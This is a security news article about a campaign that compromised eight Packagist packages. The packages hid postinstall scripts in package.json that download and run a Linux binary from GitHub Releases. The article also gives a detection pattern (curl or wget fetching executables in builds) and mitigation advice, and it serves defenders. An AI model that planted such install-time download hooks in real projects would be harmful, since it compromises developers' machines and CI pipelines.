Packagist Supply Chain Attack: 8 Packages Deliver Linux Malware
- [01] Attackers compromised eight Packagist packages to distribute Linux malware through malicious scripts embedded in package.json files.
- [02] PHP projects using Composer that also integrate JavaScript dependencies are vulnerable if they include the specific infected packages.
- [03] Organizations should audit all dependency manifests and restrict network access from build environments to unauthorized GitHub Release URLs.
A sophisticated and coordinated Supply Chain Attack has targeted the PHP ecosystem, compromising eight different packages on Packagist to distribute Linux-based malware. According to The Hacker News, the campaign utilized a novel TTP by hiding malicious logic within a file that PHP developers often overlook: the package.json file.
While the affected components are primarily known as Composer packages, the threat actors chose not to modify the composer.json manifest. Instead, they embedded malicious scripts into the package.json file, specifically targeting hybrid environments where JavaScript and PHP coexist. This strategy exploits the common practice of including JavaScript dependencies within PHP projects to manage front-end assets, increasing the likelihood that the malicious code remains undetected during standard security reviews.
Packagist package.json malware analysis
The technical execution of this attack involves the use of the postinstall or similar lifecycle scripts within the package.json manifest. When a developer or an automated build system installs the compromised package, the malicious script triggers an RCE event by executing shell commands on the host system. The primary goal of these scripts is to download a malicious Linux binary from a GitHub Releases URL.
By leveraging GitHub as a delivery mechanism, the attackers bypass many basic egress filters that might otherwise block connections to known C2 domains. The downloaded binary is designed to run on Linux environments, which are the predominant operating systems for web servers and CI/CD pipelines. Research from Socket indicates that the binary facilitates unauthorized access and potentially data exfiltration, though the full extent of the malware’s capabilities is still under investigation. No CVE has been assigned to this specific campaign at this time, making detection reliant on behavioral analysis.
How to detect Packagist supply chain attack
Security teams and SOC analysts can identify this threat by monitoring for unusual outbound network traffic originating from build servers or developer workstations. Specifically, any automated process that invokes curl or wget to retrieve executable files from GitHub Release pages should be treated as a high-fidelity IoC.
Furthermore, defenders should implement file integrity monitoring for all manifest files in a repository. Because the attack spans across language ecosystems—using a JavaScript manifest to compromise a PHP project—security tools must be configured to scan all available configuration files regardless of the primary language of the repository. Deploying a modern EDR solution can also help identify the execution of the unauthorized Linux binary once it has been downloaded to the host.
Malicious Composer packages mitigation
To effectively implement a malicious Composer packages mitigation strategy, organizations must move toward a Zero Trust model for their software dependencies. This includes pinning versions of all packages and utilizing vendor directories to lock in known-good code.
Defenders should prioritize the following actions:
- Audit all PHP projects for the presence of
package.jsonfiles and verify the legitimacy of any defined scripts. - Restrict build environments from accessing the internet, or use an allow-list to limit access to only necessary package registries.
- Use software composition analysis (SCA) tools that provide deep visibility into sub-dependencies and multi-language environments.
Advertisement